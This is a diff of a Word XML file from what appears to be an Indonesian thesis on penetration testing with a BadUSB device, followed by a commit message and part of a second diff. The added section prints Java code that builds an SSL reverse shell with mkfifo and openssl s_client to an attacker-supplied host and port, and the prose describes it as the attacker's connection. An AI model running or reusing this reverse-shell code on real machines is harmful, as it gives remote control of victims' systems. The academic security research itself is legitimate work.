+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>shell = json[1];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>host = json[0];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>port = Integer.parseInt(json[2]);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>//----------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>while(true) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>try {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>p = Runtime.getRuntime().exec(shell+" -c $@|"+shell+" 0 echo  mkfi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>fo /tmp/s; "+shell+" -i &lt; /tmp/s 2&gt;&amp;1 | openssl s_client –quiet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>connect "+host+":"+port+" &gt; /tmp/s 2&gt; /dev/null; rm</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>/tmp/s");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">     </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>break;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>} catch (Exception e) {</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>System.out.println(e)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>;}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>} return null;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:after="240"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pada </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">kode di atas, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">terdapat tiga atribut yang diambil dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>endpoint</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/properties</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, yaitu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>SHELL</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>HOST</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, serta </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>PORT_LISTENER</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ketiga </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">atribut tersebut </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">yang akan </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">digunakan untuk </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">menyambungkan koneksi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>reverse shell</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> TCP yang dibangun di sisi </w:t>
+      </w:r>
+      <w:r>
+        <w:t>sistem</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> penyerang. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>Agar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>serangan menjadi lebih aman</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">oneksi </w:t>
+      </w:r>
+      <w:r>
+        <w:t>pun</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>didukung</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> protokol SSL </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dengan </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">adanya </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">penggunaan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>self-signed certificate</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> yang disediakan sistem penyerang</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="H4"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="109" w:name="_Toc117497885"/>
+      <w:r>
+        <w:t>4.2.2.5</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Pengembangan </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Perangkat </w:t>
+      </w:r>
+      <w:r>
+        <w:t>BadUSB</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="109"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Konfigurasi pada perangkat BadUSB diawali dengan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> [ update konfigurasi boot loader + jelasin boot loader ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>[ update rules ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[ pembuatan base64 script</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> digispark.sh &gt;&gt; digispark.b64</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[ penjelasan snippet digispark.ino ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
         <w:rPr>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>[ minimum viable product ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="H4"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="109" w:name="_Toc117497885"/>
-      <w:r>
-        <w:t>4.2.2.5</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Pengembangan </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Perangkat </w:t>
-      </w:r>
-      <w:r>
-        <w:t>BadUSB</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="109"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">[ instalasi + setup full ] </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-        <w:spacing w:after="170"/>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>[ pembuatan base64 script ]</w:t>
+        <w:t>[ proses upload ]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -38506,7 +39835,6 @@
       </w:pPr>
       <w:bookmarkStart w:id="110" w:name="_Toc117497886"/>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>4.3</w:t>
       </w:r>
       <w:r>
@@ -38819,7 +40147,6 @@
       </w:pPr>
       <w:bookmarkStart w:id="117" w:name="_Toc117497893"/>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>4.3.7</w:t>
       </w:r>
       <w:r>
@@ -38943,7 +40270,6 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>BAB V</w:t>
       </w:r>
     </w:p>
@@ -39034,7 +40360,6 @@
       </w:pPr>
       <w:bookmarkStart w:id="122" w:name="_Toc117497898"/>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>DAFTAR PUSTAKA</w:t>
       </w:r>
       <w:bookmarkEnd w:id="122"/>
@@ -39595,7 +40920,6 @@
             <w:rPr>
               <w:rFonts w:eastAsia="Times New Roman"/>
             </w:rPr>
-            <w:lastRenderedPageBreak/>
             <w:t xml:space="preserve">Kaushik, K., Aggarwal, S., Mudgal, S., Saravgi, S., &amp; Mathur, V. (2021). A Novel Approach to Generate a Reverse Shell: Exploitation and Prevention. </w:t>
           </w:r>
           <w:r>
@@ -40235,7 +41559,6 @@
             <w:rPr>
               <w:rFonts w:eastAsia="Times New Roman"/>
             </w:rPr>
-            <w:lastRenderedPageBreak/>
             <w:t xml:space="preserve">Shevchenko, N., Chick, T. A., O’riordan, P., Scanlon, T. P., &amp; Woody, C. (2018). </w:t>
           </w:r>
           <w:r>
@@ -45998,6 +47321,7 @@
     <w:rsid w:val="0018700D"/>
     <w:rsid w:val="00187955"/>
     <w:rsid w:val="001B733D"/>
+    <w:rsid w:val="001C6329"/>
     <w:rsid w:val="002050EC"/>
     <w:rsid w:val="002631B8"/>
     <w:rsid w:val="002C186A"/>
@@ -46024,6 +47348,7 @@
     <w:rsid w:val="00BC74AF"/>
     <w:rsid w:val="00BE22C1"/>
     <w:rsid w:val="00CE20DE"/>
+    <w:rsid w:val="00E35B14"/>
     <w:rsid w:val="00EA3329"/>
     <w:rsid w:val="00EB31B7"/>
     <w:rsid w:val="00FA3FC5"/>

</xml_diff>

<commit_message>
update pre-engagement stat on PTES + testing out dependency & vuln checking
</commit_message>
<xml_diff>
--- a/doc/Skripsi_NoIndent_1807422020_Muhammad Nur Irsyad_Git_Word_Update.docx
+++ b/doc/Skripsi_NoIndent_1807422020_Muhammad Nur Irsyad_Git_Word_Update.docx
@@ -2175,6 +2175,11 @@
               <w:rPr>
                 <w:webHidden/>
               </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
             <w:r>
@@ -6515,7 +6520,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>38</w:t>
+              <w:t>39</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6611,7 +6616,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>39</w:t>
+              <w:t>40</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6717,7 +6722,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>40</w:t>
+              <w:t>41</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6824,7 +6829,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>40</w:t>
+              <w:t>41</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6931,7 +6936,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
